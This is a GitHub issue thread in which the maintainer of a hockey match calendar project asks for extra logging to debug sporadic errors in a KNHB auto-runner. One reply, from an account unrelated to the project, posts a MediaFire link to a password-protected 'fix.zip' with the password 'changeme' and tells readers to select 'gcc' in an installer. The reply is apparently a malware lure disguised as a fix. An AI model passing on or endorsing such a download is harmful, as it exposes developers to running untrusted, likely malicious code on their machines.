### ISSUE TITLE
[FEATURE REQUEST]: Add debugging lines to check KNHB auto-run errors

### ISSUE THREAD

**Issue by martijnvankekem** [Martijn-van-Kekem-Development/hockey-match-calendar#83]
### Explain your feature.

The KNHB auto-runner sporadically returns an unknown error. Add extra log lines to debug this and finally fix.

### Added value.

Bug fixes.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
